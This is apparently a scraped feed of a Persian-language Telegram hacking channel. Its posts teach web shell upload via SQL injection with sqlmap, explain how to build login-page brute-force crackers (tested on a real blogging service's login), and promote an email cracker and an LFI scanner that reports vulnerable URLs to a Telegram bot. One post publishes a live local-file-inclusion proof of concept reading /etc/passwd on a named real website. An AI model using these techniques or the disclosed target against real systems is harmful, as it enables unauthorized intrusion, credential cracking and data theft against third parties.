2 285
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-47 روز
-930 روز
آرشیو پست ها
2 285
اموزش نحوه اپلود شل روی سرور وب سایت از طریق اسیب پذیری SQL INJECTION با ابزار SQLMAP و پارامتر os-shell🕷
خلاصه : شما تو این ویدیو یاد میگیرد که چطور با یکی از پارامتر های SQLMAP یک شل رو اپلود کنید!🪝
Method one
#WebHacking #Sql_Injection
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
2 285
یه توضیح کوچیکی بهتون بدم راجب این ابزار
تو ورودی اول شما باید ادرس پیج لاگین سایت مورد نظرتون رو وارد کنید
خب حالا تو بخش اول لیست تگ های html که توش استفاده شده رو نمایش میده + اینکه چند بار استفاده شده
تو بخش دوم لیست اسم متغییر های که داخل سایت ساخته شده رو نشون میده
لیست سوم ایدی متغییر هایی که ساخته شده
و در لیست اخر اسم متغییر های لازم برای ساخت کرکر رو نشون میده!
(نکته : شما برای نوشتن کرکر برای یک پیج لاگین ، نیاز دارید که اسم متغییر جایی که قراره username رو وارد کنید ، جایی که باید password رو وارد کنید ، متغییری که توکن میسازه ، اسم متغییر submit و محتوای اون و یک ارور رو بدست بیارید)
تو این ویدیو دیدید که چطور ساختم
https://t.me/Team_Exploit/450
متغییر اولی که نشون داد این بود
_tt
خب این بهش نمیخوره که یوزر یا پسورد رو بخواد بگیره چون اصلا شباهتی به usr یا pass نداره
(نکته : ممکنه بعضی از پیج لاگین ها اسم سایت خودشون رو بزارن ولی استاندارد یچی تو همین مایع هاست)
تو متغییر دوم usrid بود
خب این مشخصه که قطعا username رو میگیره
پس usrid رو قرار میدم تو ورودی اولی که ابزار ازم خواست
دوباره برمیگردم میبینم تو متغییر سوم زده ups
خب اینم قاعدتا باید پسورد رو بگیره ups رو میزنم تو ورودی دوم
تو ورودی سوم متغییر توکن رو میخواد (همون _tt)چون اصلا به هیچی شبیه نبود اونو میزاریم توکن
خب متغییر چهارم زده btnSubmit خب اینم دیگه مشخصه برای submit هست وارد میکنم تو ورودی چهارم
حالا تو ورودی پنجم از من محتوای btnSubmit رو میخواد ! که ابزار برامون پیدا کرده : ورود به بخش مدیریت وبلاگ
همینو وارد میکنیم
حالا تو ورودی اخر از ما ارور میخواد ،یعنی چی؟ یعنی باید یه یوزر ولید رو داخل پیج لاگین بزنید با پسورد اشتباه تا سایت بهتون ارور بده (مثلا بگه کلمه عبور اشتباه است) این رو باید داخل ورودی اخر وارد کنید که ابزار بیاد کرکر رو طوری بنویسه که اگه پسورد درست بود و خطای کلمه عبور اشتباه است رو نداد یعنی صحیحه
اینم بگم اقا رو سایت های بزرگ اینکارو جواب نیست (مثل اینستاگرام ، اون کلا سورسش انکده) یا مثلا گیت هاب چون اون چندتا پارامتر دیگه هم میخواد (اما میشه نوشت!) بزودی ابزار رو توسعه میدم
و اینکه اگه گفتم روی ویندوز یکم مشکل داره اینکه اگه روی سایت ایرانی است کنید و بخواید محتوای submit رو وارد کنید قطعا ارور میده و خوانا نیست چون ویندوز از زبان فارسی تو cmd پشتیبانی نمیکنه ولی لینوکس و ترموکس اوکیه
نکته اخرم اینکه شما لازم نیست اسم متغییر هارو حدسی بزنید ، اگه برید تو پیج لاگین inspect بگیرید یا سورس رو دانلود کنید برید قسمتی که ورودی یوزر و پسورد رو میگیره رو بخونید خودتون میفهمید
بازم مشکلی بود کامنت بگید
2 285
ابزار CMTES منتشر شد
شما با این ابزار میتونید یه کرکر برای هر پیج لاگینی به راحتی بنویسید!
طرز کار باهاش سادست ، ادرس پیج لاگین رو بدید و میره تگ هایی که تو سایت استفاده شده + استعداد مصرف ، اسم Variable و ایدی Variable ، و Variables های لازم برای ورود به اکانت خودتون رو میگیره مثل user , pass , token و submit
خلاصه متوجه نشدید ویدیو رو ببینید سوالی بود کامنت بگید
لینک ابزار :
https://github.com/esfelurm/CMTES
star ⭐️ فراموش نشه
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
2 285
یکی از دوستان درخواست رودمپ برای پنتست وب داد
گفتم یه رودمپ خوب که خودم ازش استفاده کردم در اختیارتون بزارم
یه نصیحت هم بهتون بکنم : دنبال دوره هایی با اسم مثلا "وب هکینگ پرو" و امثال اینا نباشید
اینا فقط دارن میان یه توضیح مختصری درباره باگ میدن
مثلا شما این دوره رو دیدید ، یه باگ xss بلد شدید رفتید تست بزنید سایت الرت داد
حالا با اون دوره شما بلدید اکسپلویت کنید؟ خیر
پس روی اسیب پذیری ها فوکس کنید
مثلا XSS شما باید بری Js مسلط شی ، باید با کتابخونه هاش اشنا بشی
اسیب پذیری های دیگه هم همینطور
حداقل یک الی دو زبان برنامه نویسی برای نوشتن ابزار بلد باشید
و در اخر همیشه رایتاپ بخونید!
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
2 285
دوست دارید با کمترین زحمت یه کرکر برای هر پیج لاگینی بنویسید؟
ویدیو رو ببینید (ابزار بزودی ...)
تست روی صفحه لاگین سایت بلاگفا
2 285
کرکر ایمیل انشالا جمعه اینا امادست
اگه سوالی درخواستی بود کامنت بگید یا داخل بات
پیوی ها خیلی شلوغه:(
@F3lurm_bot
2 285
༼A vulnerable site was found!༽
Poc : http://www.foot-doctor.com/temp.php?file=/etc/passwd&title=Contact
2 285
خیلیا رو دیدم گفتن برنامه نویسی ربطی به هک و امنیت و فلان بیسار نداره
اگه جایی این حرفو شنیدید این پست رو براش فوروارد کنید
اگه شما برنامه نویسی بلد نباشید نمیتونین یه ابزار ساده بنویسین که بیاد پیلود هاتون رو روی تارگت تست کنه!
باید بشینین عین این کسخلا یکی یکی پیلود بزنید تا اخر به یه چیزی برسین ، پس برنامه نویسی نقش اول رو تو هک و امنیت داره!
برای مثال این ابزار کارش اینه که میاد پیلود های lfi رو تست میکنه اگه اسیب پذیر بود url + payload رو براتون تو ربات تلگرام (بدونه نیاز به روشن بودن فیلتر شکن) ارسال میکنه ! تاکید میکنم بدونه فیلتر شکن
سورس رو زیر همین پست میزارم
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
2 285
یه تیکه کد ساده برای دانلود و انتقال ریپوزیتوری از گیت هاب به بات تلگرام با ماژول telfhk0
Code :
from requests import get
from telfhk0 import telfhk0
start = telfhk0.Telegram(chat="Chat Id",token="Token Bot")
github = input("Link Github : ")
s = get(f"{github}/archive/refs/heads/main.zip")
with open(f'repo.zip', 'wb') as file:
file.write(s.content)
start.SendFile(address='repo.zip',caption="Downloaded!\n\nChannel : @Team_Exploit")
چت ایدی و توکن رو بدید ، و اخر لینک گیت هاب
مثلا
https://github.com/esfelurm/spider-web
#trick
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit2 285
سلام رفقا 👋🏻
توی این فولدر تلگرام ی سری کانال های خوب برنامه نویسی رو اد کردم.
روش بزنید تا به پوشه های تلگرامتون اضافه بشه
📁 t.me/addlist/NvmUA9kgu8w3NWY0
اگر شما هم کانال برنامه نویسی دارید برای اضافه شدن کانالتون به این لیست، اینجا بهم پیام بدید
